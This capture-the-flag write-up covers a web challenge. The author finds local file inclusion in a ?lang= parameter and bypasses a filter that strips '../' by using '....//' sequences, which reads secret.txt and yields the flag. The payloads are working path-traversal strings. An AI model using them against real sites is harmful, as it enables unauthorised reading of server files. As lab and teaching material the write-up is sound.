🧠 Break The Syntax CTF — Web Challenge 2 Writeup

We had a basic website with a language switcher:

?lang=en.php

?lang=en.php

And a hint saying:

• files are inside /languages/
• there is a file called secret.txt

So instantly I'm thinking:

👀 okay this smells like LFI

🔍 Step 1 — Understand the behavior

Tried normal usage:

?lang=en.php
?lang=ar.php

?lang=en.php
?lang=ar.php

Works fine.

So backend is probably something like:

include("languages/" . $_GET['lang']);

include("languages/" . $_GET['lang']);

Which means we control what gets included → nice.

🧪 Step 2 — Try basic attack

Started with the obvious:

?lang=../secret.txt
?lang=../../secret.txt

?lang=../secret.txt
?lang=../../secret.txt

But:

❌ File not found

❌ File not found

So yeah… there's a filter.

⚠️ Step 3 — Bypass the filter

At this point I thought:

they're probably blocking ../ only

So I tried something a bit weird:

?lang=....//en.php

?lang=....//en.php

💥 and it worked.

🧠 Why this worked (important)

The trick:

....//

....//

gets treated like:

../

../

So if the filter only blocks exact ../ → we bypass it easily.

This is a classic weak filter mistake.

🎯 Step 4— Get the flag

Now just try reaching secret.txt:

?lang=....//....//....//secret.txt

?lang=....//....//....//secret.txt

💥 and boom:

DTU{LFI_Filter_Byp2ss_Is_Fun}

DTU{LFI_Filter_Byp2ss_Is_Fun}

🏁 Final Payload

?lang=....//....//....//secret.txt

?lang=....//....//....//secret.txt

🚩 Flag

DTU{LFI_Filter_Byp2ss_Is_Fun}

DTU{LFI_Filter_Byp2ss_Is_Fun}

💭 Final Thoughts

Simple challenge but very useful:

• weak filters are easy to break
• always try weird patterns (....//)
• errors can leak important info

🙌 Credits

Big thanks to the organizers for the great challenge and smooth experience:

• @m4lb3nder
• @4L13N_X

Really enjoyed this one 👏🔥